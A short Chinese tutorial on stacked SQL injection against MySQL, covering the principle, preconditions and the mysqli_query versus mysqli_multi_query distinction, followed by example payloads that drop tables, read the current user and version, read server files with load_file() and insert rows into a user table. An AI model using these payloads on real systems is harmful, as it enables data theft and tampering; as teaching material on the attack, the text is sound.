目录
概述:
顾名思义,就是多条语句堆叠在一起注入
原理:
将多条语句堆叠在一起进行查询,且可以执行多条SQL语句
语句之间以分号(;)隔开,其注入攻击就是利用此特点,在第二条语句中构造payload
优势
联合查询union也可拼接语句(有局限性)
但是堆叠注入能注入任意语句
前提:
有注入点:即存在sql注入漏洞
未过滤:即未对";"号进行过滤
未禁用:即未禁止执行多条sql语句
防护:
利用mysqli_multi_query()函数就支持多条sql语句同时执行
但实际情况中,PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行
使用MYSQL
第一步:使用堆叠查询构造多条语句
select * from users where id=1;create table test like users;
第二步:查看语句是否成功执行
show tables;
第三步:删除test,再查询
select * from users where id=1;drop table test;
show tables;
(被成功执行了)
第四步:执行其它查询语句
查数据库当前用户,版本
select * from user where id=1;select 1,user(),database();
加载文件
select * from user where id=1;select load_file('文件路径');
修改数据
select * from user where id=1;insert into user(username,password) values ('好好学习','123456');
